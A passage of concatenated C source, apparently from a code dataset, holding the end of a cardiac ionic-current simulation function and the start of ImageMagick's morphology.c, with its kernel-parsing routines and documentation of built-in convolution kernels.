real CaSR = sv[14];
real Nai = sv[15];
real Ki = sv[16];
//External concentrations
real Ko=5.4;
real Cao=2.0;
real Nao=140.0;
//Intracellular volumes
real Vc=0.016404;
real Vsr=0.001094;
//Calcium dynamics
real Bufc=0.15f;
real Kbufc=0.001f;
real Bufsr=10.f;
real Kbufsr=0.3f;
real taufca=2.f;
real taug=2.f;
real Vmaxup=0.000425f;
real Kup=0.00025f;
//Constants
const real R = 8314.472f;
const real F = 96485.3415f;
const real T =310.0f;
real RTONF =(R*T)/F;
//Cellular capacitance
real CAPACITANCE=0.185;
//Parameters for currents
//Parameters for IKr
real Gkr=0.096;
//Parameters for Iks
real pKNa=0.03;
// [!] Epicardium cell
real Gks=0.245;
//Parameters for Ik1
real GK1=5.405;
//Parameters for Ito
// [!] Epicardium cell
real Gto=0.294;
//Parameters for INa
real GNa=14.838;
//Parameters for IbNa
real GbNa=0.00029;
//Parameters for INaK
real KmK=1.0;
real KmNa=40.0;
real knak=1.362;
//Parameters for ICaL
real GCaL=0.000175;
//Parameters for IbCa
real GbCa=0.000592;
//Parameters for INaCa
real knaca=1000;
real KmNai=87.5;
real KmCa=1.38;
real ksat=0.1;
real n=0.35;
//Parameters for IpCa
real GpCa=0.825;
real KpCa=0.0005;
//Parameters for IpK;
real GpK=0.0146;
real parameters []={14.2751110459407,0.000197490405913840,0.000138093676576538,0.000459611951400222,0.248312214169369,0.146550920650185,0.141336894566835,4.51002424199619,0.0147942147525980,1.60874334855823,1098.91591518736,0.000497071049372500,0.357179450926053,0.0190817376935230,0.00515881032161095,3.63348608264117e-05};
GNa=parameters[0];
GbNa=parameters[1];
GCaL=parameters[2];
GbCa=parameters[3];
Gto=parameters[4];
Gkr=parameters[5];
Gks=parameters[6];
GK1=parameters[7];
GpK=parameters[8];
knak=parameters[9];
knaca=parameters[10];
Vmaxup=parameters[11];
GpCa=parameters[12];
real arel=parameters[13];
real crel=parameters[14];
real Vleak=parameters[15];
real IKr;
real IKs;
real IK1;
real Ito;
real INa;
real IbNa;
real ICaL;
real IbCa;
real INaCa;
real IpCa;
real IpK;
real INaK;
real Irel;
real Ileak;
real dNai;
real dKi;
real dCai;
real dCaSR;
real A;
// real BufferFactorc;
// real BufferFactorsr;
real SERCA;
real Caisquare;
real CaSRsquare;
real CaCurrent;
real CaSRCurrent;
real fcaold;
real gold;
real Ek;
real Ena;
real Eks;
real Eca;
real CaCSQN;
real bjsr;
real cjsr;
real CaBuf;
real bc;
real cc;
real Ak1;
real Bk1;
real rec_iK1;
real rec_ipK;
real rec_iNaK;
real AM;
real BM;
real AH_1;
real BH_1;
real AH_2;
real BH_2;
real AJ_1;
real BJ_1;
real AJ_2;
real BJ_2;
real M_INF;
real H_INF;
real J_INF;
real TAU_M;
real TAU_H;
real TAU_J;
real axr1;
real bxr1;
real axr2;
real bxr2;
real Xr1_INF;
real Xr2_INF;
real TAU_Xr1;
real TAU_Xr2;
real Axs;
real Bxs;
real Xs_INF;
real TAU_Xs;
real R_INF;
real TAU_R;
real S_INF;
real TAU_S;
real Ad;
real Bd;
real Cd;
real TAU_D;
real D_INF;
real TAU_F;
real F_INF;
real FCa_INF;
real G_INF;
real inverseVcF2=1/(2*Vc*F);
real inverseVcF=1./(Vc*F);
real Kupsquare=Kup*Kup;
// real BufcKbufc=Bufc*Kbufc;
// real Kbufcsquare=Kbufc*Kbufc;
// real Kbufc2=2*Kbufc;
// real BufsrKbufsr=Bufsr*Kbufsr;
// const real Kbufsrsquare=Kbufsr*Kbufsr;
// const real Kbufsr2=2*Kbufsr;
const real exptaufca=exp(-dt/taufca);
const real exptaug=exp(-dt/taug);
real sItot;
//Needed to compute currents
Ek=RTONF*(log((Ko/Ki)));
Ena=RTONF*(log((Nao/Nai)));
Eks=RTONF*(log((Ko+pKNa*Nao)/(Ki+pKNa*Nai)));
Eca=0.5*RTONF*(log((Cao/Cai)));
Ak1=0.1/(1.+exp(0.06*(svolt-Ek-200)));
Bk1=(3.*exp(0.0002*(svolt-Ek+100))+
exp(0.1*(svolt-Ek-10)))/(1.+exp(-0.5*(svolt-Ek)));
rec_iK1=Ak1/(Ak1+Bk1);
rec_iNaK=(1./(1.+0.1245*exp(-0.1*svolt*F/(R*T))+0.0353*exp(-svolt*F/(R*T))));
rec_ipK=1./(1.+exp((25-svolt)/5.98));
//Compute currents
INa=GNa*sm*sm*sm*sh*sj*(svolt-Ena);
ICaL=GCaL*sd*sf*sfca*4*svolt*(F*F/(R*T))*
(exp(2*svolt*F/(R*T))*Cai-0.341*Cao)/(exp(2*svolt*F/(R*T))-1.);
Ito=Gto*sr*ss*(svolt-Ek);
IKr=Gkr*sqrt(Ko/5.4)*sxr1*sxr2*(svolt-Ek);
IKs=Gks*sxs*sxs*(svolt-Eks);
IK1=GK1*rec_iK1*(svolt-Ek);
INaCa=knaca*(1./(KmNai*KmNai*KmNai+Nao*Nao*Nao))*(1./(KmCa+Cao))*
(1./(1+ksat*exp((n-1)*svolt*F/(R*T))))*
(exp(n*svolt*F/(R*T))*Nai*Nai*Nai*Cao-
exp((n-1)*svolt*F/(R*T))*Nao*Nao*Nao*Cai*2.5);
INaK=knak*(Ko/(Ko+KmK))*(Nai/(Nai+KmNa))*rec_iNaK;
IpCa=GpCa*Cai/(KpCa+Cai);
IpK=GpK*rec_ipK*(svolt-Ek);
IbNa=GbNa*(svolt-Ena);
IbCa=GbCa*(svolt-Eca);
//Determine total current
(sItot) = IKr +
IKs +
IK1 +
Ito +
INa +
IbNa +
ICaL +
IbCa +
INaK +
INaCa +
IpCa +
IpK +
stim_current;
//update concentrations
Caisquare=Cai*Cai;
CaSRsquare=CaSR*CaSR;
CaCurrent=-(ICaL+IbCa+IpCa-2.0f*INaCa)*inverseVcF2*CAPACITANCE;
A=arel*CaSRsquare/(0.0625f+CaSRsquare)+crel;
Irel=A*sd*sg;
Ileak=Vleak*(CaSR-Cai);
SERCA=Vmaxup/(1.f+(Kupsquare/Caisquare));
CaSRCurrent=SERCA-Irel-Ileak;
CaCSQN=Bufsr*CaSR/(CaSR+Kbufsr);
dCaSR=dt*(Vc/Vsr)*CaSRCurrent;
bjsr=Bufsr-CaCSQN-dCaSR-CaSR+Kbufsr;
cjsr=Kbufsr*(CaCSQN+dCaSR+CaSR);
CaSR=(sqrt(bjsr*bjsr+4.*cjsr)-bjsr)/2.;
CaBuf=Bufc*Cai/(Cai+Kbufc);
dCai=dt*(CaCurrent-CaSRCurrent);
bc=Bufc-CaBuf-dCai-Cai+Kbufc;
cc=Kbufc*(CaBuf+dCai+Cai);
Cai=(sqrt(bc*bc+4*cc)-bc)/2;
dNai=-(INa+IbNa+3*INaK+3*INaCa)*inverseVcF*CAPACITANCE;
Nai+=dt*dNai;
dKi=-(stim_current+IK1+Ito+IKr+IKs-2*INaK+IpK)*inverseVcF*CAPACITANCE;
Ki+=dt*dKi;
//compute steady state values and time constants
AM=1./(1.+exp((-60.-svolt)/5.));
BM=0.1/(1.+exp((svolt+35.)/5.))+0.10/(1.+exp((svolt-50.)/200.));
TAU_M=AM*BM;
M_INF=1./((1.+exp((-56.86-svolt)/9.03))*(1.+exp((-56.86-svolt)/9.03)));
if (svolt>=-40.)
{
AH_1=0.;
BH_1=(0.77/(0.13*(1.+exp(-(svolt+10.66)/11.1))));
TAU_H= 1.0/(AH_1+BH_1);
}
else
{
AH_2=(0.057*exp(-(svolt+80.)/6.8));
BH_2=(2.7*exp(0.079*svolt)+(3.1e5)*exp(0.3485*svolt));
TAU_H=1.0/(AH_2+BH_2);
}
H_INF=1./((1.+exp((svolt+71.55)/7.43))*(1.+exp((svolt+71.55)/7.43)));
if(svolt>=-40.)
{
AJ_1=0.;
BJ_1=(0.6*exp((0.057)*svolt)/(1.+exp(-0.1*(svolt+32.))));
TAU_J= 1.0/(AJ_1+BJ_1);
}
else
{
AJ_2=(((-2.5428e4)*exp(0.2444*svolt)-(6.948e-6)*
exp(-0.04391*svolt))*(svolt+37.78)/
(1.+exp(0.311*(svolt+79.23))));
BJ_2=(0.02424*exp(-0.01052*svolt)/(1.+exp(-0.1378*(svolt+40.14))));
TAU_J= 1.0/(AJ_2+BJ_2);
}
J_INF=H_INF;
Xr1_INF=1./(1.+exp((-26.-svolt)/7.));
axr1=450./(1.+exp((-45.-svolt)/10.));
bxr1=6./(1.+exp((svolt-(-30.))/11.5));
TAU_Xr1=axr1*bxr1;
Xr2_INF=1./(1.+exp((svolt-(-88.))/24.));
axr2=3./(1.+exp((-60.-svolt)/20.));
bxr2=1.12/(1.+exp((svolt-60.)/20.));
TAU_Xr2=axr2*bxr2;
Xs_INF=1./(1.+exp((-5.-svolt)/14.));
Axs=1100./(sqrt(1.+exp((-10.-svolt)/6)));
Bxs=1./(1.+exp((svolt-60.)/20.));
TAU_Xs=Axs*Bxs;
R_INF=1./(1.+exp((20-svolt)/6.));
S_INF=1./(1.+exp((svolt+20)/5.));
TAU_R=9.5*exp(-(svolt+40.)*(svolt+40.)/1800.)+0.8;
TAU_S=85.*exp(-(svolt+45.)*(svolt+45.)/320.)+5./(1.+exp((svolt-20.)/5.))+3.;
D_INF=1./(1.+exp((-5-svolt)/7.5));
Ad=1.4/(1.+exp((-35-svolt)/13))+0.25;
Bd=1.4/(1.+exp((svolt+5)/5));
Cd=1./(1.+exp((50-svolt)/20));
TAU_D=Ad*Bd+Cd;
F_INF=1./(1.+exp((svolt+20)/7));
//TAU_F=1125*exp(-(svolt+27)*(svolt+27)/300)+80+165/(1.+exp((25-svolt)/10));
TAU_F=1125*exp(-(svolt+27)*(svolt+27)/240)+80+165/(1.+exp((25-svolt)/10)); // Updated from CellML
FCa_INF=(1./(1.+pow((Cai/0.000325),8))+
0.1/(1.+exp((Cai-0.0005)/0.0001))+
0.20/(1.+exp((Cai-0.00075)/0.0008))+
0.23 )/1.46;
if(Cai<0.00035)
G_INF=1./(1.+pow((Cai/0.00035),6));
else
G_INF=1./(1.+pow((Cai/0.00035),16));
//Update gates
rDY_[1] = M_INF-(M_INF-sm)*exp(-dt/TAU_M);
rDY_[2] = H_INF-(H_INF-sh)*exp(-dt/TAU_H);
rDY_[3] = J_INF-(J_INF-sj)*exp(-dt/TAU_J);
rDY_[4] = Xr1_INF-(Xr1_INF-sxr1)*exp(-dt/TAU_Xr1);
rDY_[5] = Xr2_INF-(Xr2_INF-sxr2)*exp(-dt/TAU_Xr2);
rDY_[6] = Xs_INF-(Xs_INF-sxs)*exp(-dt/TAU_Xs);
rDY_[7] = S_INF-(S_INF-ss)*exp(-dt/TAU_S);
rDY_[8] = R_INF-(R_INF-sr)*exp(-dt/TAU_R);
rDY_[9] = D_INF-(D_INF-sd)*exp(-dt/TAU_D);
rDY_[10] = F_INF-(F_INF-sf)*exp(-dt/TAU_F);
fcaold= sfca;
sfca = FCa_INF-(FCa_INF-sfca)*exptaufca;
if(sfca>fcaold && (svolt)>-37.0)
sfca = fcaold;
gold = sg;
sg = G_INF-(G_INF-sg)*exptaug;
if(sg>gold && (svolt)>-37.0)
sg=gold;
//update voltage
rDY_[0] = svolt + dt*(-sItot);
rDY_[11] = sfca;
rDY_[12] = sg;
rDY_[13] = Cai;
rDY_[14] = CaSR;
rDY_[15] = Nai;
rDY_[16] = Ki;
} |
morphology.c | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M M OOO RRRR PPPP H H OOO L OOO GGGG Y Y %
% MM MM O O R R P P H H O O L O O G Y Y %
% M M M O O RRRR PPPP HHHHH O O L O O G GGG Y %
% M M O O R R P H H O O L O O G G Y %
% M M OOO R R P H H OOO LLLLL OOO GGG Y %
% %
% %
% MagickCore Morphology Methods %
% %
% Software Design %
% Anthony Thyssen %
% January 2010 %
% %
% %
% Copyright 1999-2011 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% Morpology is the the application of various kernels, of any size and even
% shape, to a image in various ways (typically binary, but not always).
%
% Convolution (weighted sum or average) is just one specific type of
% morphology. Just one that is very common for image bluring and sharpening
% effects. Not only 2D Gaussian blurring, but also 2-pass 1D Blurring.
%
% This module provides not only a general morphology function, and the ability
% to apply more advanced or iterative morphologies, but also functions for the
% generation of many different types of kernel arrays from user supplied
% arguments. Prehaps even the generation of a kernel from a small image.
*/
/*
Include declarations.
*/
#include "magick/studio.h"
#include "magick/artifact.h"
#include "magick/cache-view.h"
#include "magick/color-private.h"
#include "magick/enhance.h"
#include "magick/exception.h"
#include "magick/exception-private.h"
#include "magick/gem.h"
#include "magick/hashmap.h"
#include "magick/image.h"
#include "magick/image-private.h"
#include "magick/list.h"
#include "magick/magick.h"
#include "magick/memory_.h"
#include "magick/monitor-private.h"
#include "magick/morphology.h"
#include "magick/morphology-private.h"
#include "magick/option.h"
#include "magick/pixel-private.h"
#include "magick/prepress.h"
#include "magick/quantize.h"
#include "magick/registry.h"
#include "magick/semaphore.h"
#include "magick/splay-tree.h"
#include "magick/statistic.h"
#include "magick/string_.h"
#include "magick/string-private.h"
#include "magick/token.h"
#include "magick/utility.h"
/*
** The following test is for special floating point numbers of value NaN (not
** a number), that may be used within a Kernel Definition. NaN's are defined
** as part of the IEEE standard for floating point number representation.
**
** These are used as a Kernel value to mean that this kernel position is not
** part of the kernel neighbourhood for convolution or morphology processing,
** and thus should be ignored. This allows the use of 'shaped' kernels.
**
** The special properity that two NaN's are never equal, even if they are from
** the same variable allow you to test if a value is special NaN value.
**
** This macro IsNaN() is thus is only true if the value given is NaN.
*/
#define IsNan(a) ((a)!=(a))
/*
Other global definitions used by module.
*/
static inline double MagickMin(const double x,const double y)
{
return( x < y ? x : y);
}
static inline double MagickMax(const double x,const double y)
{
return( x > y ? x : y);
}
#define Minimize(assign,value) assign=MagickMin(assign,value)
#define Maximize(assign,value) assign=MagickMax(assign,value)
/* Currently these are only internal to this module */
static void
CalcKernelMetaData(KernelInfo *),
ExpandMirrorKernelInfo(KernelInfo *),
ExpandRotateKernelInfo(KernelInfo *, const double),
RotateKernelInfo(KernelInfo *, double);
/* Quick function to find last kernel in a kernel list */
static inline KernelInfo *LastKernelInfo(KernelInfo *kernel)
{
while (kernel->next != (KernelInfo *) NULL)
kernel = kernel->next;
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% A c q u i r e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% AcquireKernelInfo() takes the given string (generally supplied by the
% user) and converts it into a Morphology/Convolution Kernel. This allows
% users to specify a kernel from a number of pre-defined kernels, or to fully
% specify their own kernel for a specific Convolution or Morphology
% Operation.
%
% The kernel so generated can be any rectangular array of floating point
% values (doubles) with the 'control point' or 'pixel being affected'
% anywhere within that array of values.
%
% Previously IM was restricted to a square of odd size using the exact
% center as origin, this is no longer the case, and any rectangular kernel
% with any value being declared the origin. This in turn allows the use of
% highly asymmetrical kernels.
%
% The floating point values in the kernel can also include a special value
% known as 'nan' or 'not a number' to indicate that this value is not part
% of the kernel array. This allows you to shaped the kernel within its
% rectangular area. That is 'nan' values provide a 'mask' for the kernel
% shape. However at least one non-nan value must be provided for correct
% working of a kernel.
%
% The returned kernel should be freed using the DestroyKernelInfo() when you
% are finished with it. Do not free this memory yourself.
%
% Input kernel defintion strings can consist of any of three types.
%
% "name:args[[@><]"
% Select from one of the built in kernels, using the name and
% geometry arguments supplied. See AcquireKernelBuiltIn()
%
% "WxH[+X+Y][@><]:num, num, num ..."
% a kernel of size W by H, with W*H floating point numbers following.
% the 'center' can be optionally be defined at +X+Y (such that +0+0
% is top left corner). If not defined the pixel in the center, for
% odd sizes, or to the immediate top or left of center for even sizes
% is automatically selected.
%
% "num, num, num, num, ..."
% list of floating point numbers defining an 'old style' odd sized
% square kernel. At least 9 values should be provided for a 3x3
% square kernel, 25 for a 5x5 square kernel, 49 for 7x7, etc.
% Values can be space or comma separated. This is not recommended.
%
% You can define a 'list of kernels' which can be used by some morphology
% operators A list is defined as a semi-colon separated list kernels.
%
% " kernel ; kernel ; kernel ; "
%
% Any extra ';' characters, at start, end or between kernel defintions are
% simply ignored.
%
% The special flags will expand a single kernel, into a list of rotated
% kernels. A '@' flag will expand a 3x3 kernel into a list of 45-degree
% cyclic rotations, while a '>' will generate a list of 90-degree rotations.
% The '<' also exands using 90-degree rotates, but giving a 180-degree
% reflected kernel before the +/- 90-degree rotations, which can be important
% for Thinning operations.
%
% Note that 'name' kernels will start with an alphabetic character while the
% new kernel specification has a ':' character in its specification string.
% If neither is the case, it is assumed an old style of a simple list of
% numbers generating a odd-sized square kernel has been given.
%
% The format of the AcquireKernal method is:
%
% KernelInfo *AcquireKernelInfo(const char *kernel_string)
%
% A description of each parameter follows:
%
% o kernel_string: the Morphology/Convolution kernel wanted.
%
*/
/* This was separated so that it could be used as a separate
** array input handling function, such as for -color-matrix
*/
static KernelInfo *ParseKernelArray(const char *kernel_string)
{
KernelInfo
*kernel;
char
token[MaxTextExtent];
const char
*p,
*end;
register ssize_t
i;
double
nan = sqrt((double)-1.0); /* Special Value : Not A Number */
MagickStatusType
flags;
GeometryInfo
args;
kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (kernel == (KernelInfo *)NULL)
return(kernel);
(void) ResetMagickMemory(kernel,0,sizeof(*kernel));
kernel->minimum = kernel->maximum = kernel->angle = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->type = UserDefinedKernel;
kernel->next = (KernelInfo *) NULL;
kernel->signature = MagickSignature;
/* find end of this specific kernel definition string */
end = strchr(kernel_string, ';');
if ( end == (char *) NULL )
end = strchr(kernel_string, '\0');
/* clear flags - for Expanding kernel lists thorugh rotations */
flags = NoValue;
/* Has a ':' in argument - New user kernel specification */
p = strchr(kernel_string, ':');
if ( p != (char *) NULL && p < end)
{
/* ParseGeometry() needs the geometry separated! -- Arrgghh */
memcpy(token, kernel_string, (size_t) (p-kernel_string));
token[p-kernel_string] = '\0';
SetGeometryInfo(&args);
flags = ParseGeometry(token, &args);
/* Size handling and checks of geometry settings */
if ( (flags & WidthValue) == 0 ) /* if no width then */
args.rho = args.sigma; /* then width = height */
if ( args.rho < 1.0 ) /* if width too small */
args.rho = 1.0; /* then width = 1 */
if ( args.sigma < 1.0 ) /* if height too small */
args.sigma = args.rho; /* then height = width */
kernel->width = (size_t)args.rho;
kernel->height = (size_t)args.sigma;
/* Offset Handling and Checks */
if ( args.xi < 0.0 || args.psi < 0.0 )
return(DestroyKernelInfo(kernel));
kernel->x = ((flags & XValue)!=0) ? (ssize_t)args.xi
: (ssize_t) (kernel->width-1)/2;
kernel->y = ((flags & YValue)!=0) ? (ssize_t)args.psi
: (ssize_t) (kernel->height-1)/2;
if ( kernel->x >= (ssize_t) kernel->width ||
kernel->y >= (ssize_t) kernel->height )
return(DestroyKernelInfo(kernel));
p++; /* advance beyond the ':' */
}
else
{ /* ELSE - Old old specification, forming odd-square kernel */
/* count up number of values given */
p=(const char *) kernel_string;
while ((isspace((int) ((unsigned char) *p)) != 0) || (*p == '\''))
p++; /* ignore "'" chars for convolve filter usage - Cristy */
for (i=0; p < end; i++)
{
GetMagickToken(p,&p,token);
if (*token == ',')
GetMagickToken(p,&p,token);
}
/* set the size of the kernel - old sized square */
kernel->width = kernel->height= (size_t) sqrt((double) i+1.0);
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
p=(const char *) kernel_string;
while ((isspace((int) ((unsigned char) *p)) != 0) || (*p == '\''))
p++; /* ignore "'" chars for convolve filter usage - Cristy */
}
/* Read in the kernel values from rest of input string argument */
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
kernel->minimum = +MagickHuge;
kernel->maximum = -MagickHuge;
kernel->negative_range = kernel->positive_range = 0.0;
for (i=0; (i < (ssize_t) (kernel->width*kernel->height)) && (p < end); i++)
{
GetMagickToken(p,&p,token);
if (*token == ',')
GetMagickToken(p,&p,token);
if ( LocaleCompare("nan",token) == 0
|| LocaleCompare("-",token) == 0 ) {
kernel->values[i] = nan; /* do not include this value in kernel */
}
else {
kernel->values[i] = StringToDouble(token);
( kernel->values[i] < 0)
? ( kernel->negative_range += kernel->values[i] )
: ( kernel->positive_range += kernel->values[i] );
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
}
}
/* sanity check -- no more values in kernel definition */
GetMagickToken(p,&p,token);
if ( *token != '\0' && *token != ';' && *token != '\'' )
return(DestroyKernelInfo(kernel));
#if 0
/* this was the old method of handling a incomplete kernel */
if ( i < (ssize_t) (kernel->width*kernel->height) ) {
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
for ( ; i < (ssize_t) (kernel->width*kernel->height); i++)
kernel->values[i]=0.0;
}
#else
/* Number of values for kernel was not enough - Report Error */
if ( i < (ssize_t) (kernel->width*kernel->height) )
return(DestroyKernelInfo(kernel));
#endif
/* check that we recieved at least one real (non-nan) value! */
if ( kernel->minimum == MagickHuge )
return(DestroyKernelInfo(kernel));
if ( (flags & AreaValue) != 0 ) /* '@' symbol in kernel size */
ExpandRotateKernelInfo(kernel, 45.0); /* cyclic rotate 3x3 kernels */
else if ( (flags & GreaterValue) != 0 ) /* '>' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 90.0); /* 90 degree rotate of kernel */
else if ( (flags & LessValue) != 0 ) /* '<' symbol in kernel args */
ExpandMirrorKernelInfo(kernel); /* 90 degree mirror rotate */
return(kernel);
}
static KernelInfo *ParseKernelName(const char *kernel_string)
{
char
token[MaxTextExtent];
const char
*p,
*end;
GeometryInfo
args;
KernelInfo
*kernel;
MagickStatusType
flags;
ssize_t
type;
/* Parse special 'named' kernel */
GetMagickToken(kernel_string,&p,token);
type=ParseMagickOption(MagickKernelOptions,MagickFalse,token);
if ( type < 0 || type == UserDefinedKernel )
return((KernelInfo *)NULL); /* not a valid named kernel */
while (((isspace((int) ((unsigned char) *p)) != 0) ||
(*p == ',') || (*p == ':' )) && (*p != '\0') && (*p != ';'))
p++;
end = strchr(p, ';'); /* end of this kernel defintion */
if ( end == (char *) NULL )
end = strchr(p, '\0');
/* ParseGeometry() needs the geometry separated! -- Arrgghh */
memcpy(token, p, (size_t) (end-p));
token[end-p] = '\0';
SetGeometryInfo(&args);
flags = ParseGeometry(token, &args);
#if 0
/* For Debugging Geometry Input */
fprintf(stderr, "Geometry = 0x%04X : %lg x %lg %+lg %+lg\n",
flags, args.rho, args.sigma, args.xi, args.psi );
#endif
/* special handling of missing values in input string */
switch( type ) {
/* Shape Kernel Defaults */
case UnityKernel:
if ( (flags & WidthValue) == 0 )
args.rho = 1.0; /* Default scale = 1.0, zero is valid */
break;
case SquareKernel:
case DiamondKernel:
case OctagonKernel:
case DiskKernel:
case PlusKernel:
case CrossKernel:
if ( (flags & HeightValue) == 0 )
args.sigma = 1.0; /* Default scale = 1.0, zero is valid */
break;
case RingKernel:
if ( (flags & XValue) == 0 )
args.xi = 1.0; /* Default scale = 1.0, zero is valid */
break;
case RectangleKernel: /* Rectangle - set size defaults */
if ( (flags & WidthValue) == 0 ) /* if no width then */
args.rho = args.sigma; /* then width = height */
if ( args.rho < 1.0 ) /* if width too small */
args.rho = 3; /* then width = 3 */
if ( args.sigma < 1.0 ) /* if height too small */
args.sigma = args.rho; /* then height = width */
if ( (flags & XValue) == 0 ) /* center offset if not defined */
args.xi = (double)(((ssize_t)args.rho-1)/2);
if ( (flags & YValue) == 0 )
args.psi = (double)(((ssize_t)args.sigma-1)/2);
break;
/* Distance Kernel Defaults */
case ChebyshevKernel:
case ManhattanKernel:
case OctagonalKernel:
case EuclideanKernel:
if ( (flags & HeightValue) == 0 ) /* no distance scale */
args.sigma = 100.0; /* default distance scaling */
else if ( (flags & AspectValue ) != 0 ) /* '!' flag */
args.sigma = QuantumRange/(args.sigma+1); /* maximum pixel distance */
else if ( (flags & PercentValue ) != 0 ) /* '%' flag */
args.sigma *= QuantumRange/100.0; /* percentage of color range */
break;
default:
break;
}
kernel = AcquireKernelBuiltIn((KernelInfoType)type, &args);
if ( kernel == (KernelInfo *) NULL )
return(kernel);
/* global expand to rotated kernel list - only for single kernels */
if ( kernel->next == (KernelInfo *) NULL ) {
if ( (flags & AreaValue) != 0 ) /* '@' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 45.0);
else if ( (flags & GreaterValue) != 0 ) /* '>' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 90.0);
else if ( (flags & LessValue) != 0 ) /* '<' symbol in kernel args */
ExpandMirrorKernelInfo(kernel);
}
return(kernel);
}
MagickExport KernelInfo *AcquireKernelInfo(const char *kernel_string)
{
KernelInfo
*kernel,
*new_kernel;
char
token[MaxTextExtent];
const char
*p;
size_t
kernel_number;
p = kernel_string;
kernel = NULL;
kernel_number = 0;
while ( GetMagickToken(p,NULL,token), *token != '\0' ) {
/* ignore extra or multiple ';' kernel separators */
if ( *token != ';' ) {
/* tokens starting with alpha is a Named kernel */
if (isalpha((int) *token) != 0)
new_kernel = ParseKernelName(p);
else /* otherwise a user defined kernel array */
new_kernel = ParseKernelArray(p);
/* Error handling -- this is not proper error handling! */
if ( new_kernel == (KernelInfo *) NULL ) {
fprintf(stderr, "Failed to parse kernel number #%.20g\n",(double)
kernel_number);
if ( kernel != (KernelInfo *) NULL )
kernel=DestroyKernelInfo(kernel);
return((KernelInfo *) NULL);
}
/* initialise or append the kernel list */
if ( kernel == (KernelInfo *) NULL )
kernel = new_kernel;
else
LastKernelInfo(kernel)->next = new_kernel;
}
/* look for the next kernel in list */
p = strchr(p, ';');
if ( p == (char *) NULL )
break;
p++;
}
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% A c q u i r e K e r n e l B u i l t I n %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% AcquireKernelBuiltIn() returned one of the 'named' built-in types of
% kernels used for special purposes such as gaussian blurring, skeleton
% pruning, and edge distance determination.
%
% They take a KernelType, and a set of geometry style arguments, which were
% typically decoded from a user supplied string, or from a more complex
% Morphology Method that was requested.
%
% The format of the AcquireKernalBuiltIn method is:
%
% KernelInfo *AcquireKernelBuiltIn(const KernelInfoType type,
% const GeometryInfo args)
%
% A description of each parameter follows:
%
% o type: the pre-defined type of kernel wanted
%
% o args: arguments defining or modifying the kernel
%
% Convolution Kernels
%
% Unity
% The a No-Op or Scaling single element kernel.
%
% Gaussian:{radius},{sigma}
% Generate a two-dimentional gaussian kernel, as used by -gaussian.
% The sigma for the curve is required. The resulting kernel is
% normalized,
%
% If 'sigma' is zero, you get a single pixel on a field of zeros.
%
% NOTE: that the 'radius' is optional, but if provided can limit (clip)
% the final size of the resulting kernel to a square 2*radius+1 in size.
% The radius should be at least 2 times that of the sigma value, or
% sever clipping and aliasing may result. If not given or set to 0 the
% radius will be determined so as to produce the best minimal error
% result, which is usally much larger than is normally needed.
%
% LoG:{radius},{sigma}
% "Laplacian of a Gaussian" or "Mexician Hat" Kernel.
% The supposed ideal edge detection, zero-summing kernel.
%
% An alturnative to this kernel is to use a "DoG" with a sigma ratio of
% approx 1.6 (according to wikipedia).
%
% DoG:{radius},{sigma1},{sigma2}
% "Difference of Gaussians" Kernel.
% As "Gaussian" but with a gaussian produced by 'sigma2' subtracted
% from the gaussian produced by 'sigma1'. Typically sigma2 > sigma1.
% The result is a zero-summing kernel.
%
% Blur:{radius},{sigma}[,{angle}]
% Generates a 1 dimensional or linear gaussian blur, at the angle given
% (current restricted to orthogonal angles). If a 'radius' is given the
% kernel is clipped to a width of 2*radius+1. Kernel can be rotated
% by a 90 degree angle.
%
% If 'sigma' is zero, you get a single pixel on a field of zeros.
%
% Note that two convolutions with two "Blur" kernels perpendicular to
% each other, is equivelent to a far larger "Gaussian" kernel with the
% same sigma value, However it is much faster to apply. This is how the
% "-blur" operator actually works.
%
% Comet:{width},{sigma},{angle}
% Blur in one direction only, much like how a bright object leaves
% a comet like trail. The Kernel is actually half a gaussian curve,
% Adding two such blurs in opposite directions produces a Blur Kernel.
% Angle can be rotated in multiples of 90 degrees.
%
% Note that the first argument is the width of the kernel and not the
% radius of the kernel.
%
% # Still to be implemented...
% #
% # Filter2D
% # Filter1D
% # Set kernel values using a resize filter, and given scale (sigma)
% # Cylindrical or Linear. Is this posible with an image?
% #
%
% Named Constant Convolution Kernels
%
% All these are unscaled, zero-summing kernels by default. As such for
% non-HDRI version of ImageMagick some form of normalization, user scaling,
% and biasing the results is recommended, to prevent the resulting image
% being 'clipped'.
%
% The 3x3 kernels (most of these) can be circularly rotated in multiples of
